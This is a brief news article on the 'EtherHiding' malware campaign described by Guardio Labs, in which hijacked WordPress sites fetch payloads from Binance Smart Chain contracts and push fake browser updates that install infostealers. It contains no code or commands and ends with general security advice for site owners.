A new threat lurks in the Binance Smart Chain. Security experts have recently uncovered a malware attack targeting the BSC smart contracts. This malicious campaign, known as “EtherHiding,” employs a devious tactic to spread malware to unsuspecting users. Cybercriminals are focusing their efforts on WordPress websites, injecting them with malicious code designed to retrieve partial payloads from blockchain contracts.
Guardio Labs researchers, in a detailed report following two months of extensive study involving hijacked WordPress sites, revealed the intricacies of this new threat. The attackers entice users into downloading seemingly legitimate “browser updates.” Through this method, the cybercriminals can remotely control the infection process. They can display tailored messages, change strategies, update blocked domains, and replace detected payloads without needing to re-access the WordPress sites, making it exceptionally challenging to counter.
In the last 2 months or so, we have been facing yet another “fake-update” malware propagation campaign. In the attack flow, a site is defaced with a very believable overlay demanding a browser update before the site can be accessed. The fake “update” turns out to be vicious infostealer malware like RedLine, Amadey, or Lumma.
Initially, the attackers hosted their code on exploited Cloudflare Worker hosts, but after being taken down, they swiftly changed and adapted their strategy to exploit the decentralized, anonymous, and public nature of blockchain technology. This shift has made their campaign even more elusive and challenging to detect.
Binance Smart Chain Malware-Double-Edged Sword Of Decentralized Technology
Binance Smart Chain launched three years ago, emphasizes smart contracts—coded agreements executing actions automatically under specific conditions. Due to the public and immutable nature of the Binance Smart Chain, code can be hosted “on-chain,” rendering it impervious to takedowns. This characteristic, while advantageous, also poses a significant challenge, as illustrated by this attack. The malicious code is hosted and served in a manner that cannot be blocked, highlighting the double-edged sword of decentralized technology.
Guardio Labs advised users to safeguard their site and, and maintain an updated WordPress infrastructure and plugins. Additionally, securing credentials, utilizing strong, regularly changed passwords, and remaining vigilant about their site’s activities are key measures in defending against evolving cyber threats.